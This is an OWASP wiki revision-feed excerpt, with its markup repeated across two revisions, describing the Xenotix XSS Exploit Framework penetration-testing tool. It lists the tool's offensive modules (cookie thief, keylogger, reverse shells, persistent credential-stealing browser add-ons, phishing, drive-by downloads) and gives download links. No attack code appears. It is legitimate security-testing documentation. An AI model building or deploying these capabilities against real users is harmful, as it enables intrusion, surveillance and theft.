It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]&lt;br /&gt;
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Introduction to OWASP Xenotix XSS Exploit Framework'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|C15po4TK4Os}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS in GET Request'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|fPC_stgovcU}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with GET Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|K5nbgvXvY1g}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J_qdm_-XVV0}}&lt;br /&gt;
&lt;br /&gt;
'''Detecting XSS with Advanced Request Fuzzer'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|AqdEG-vsywQ}}&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185542</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=185542"/>
				<updated>2014-11-19T05:28:34Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: download link shorten&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
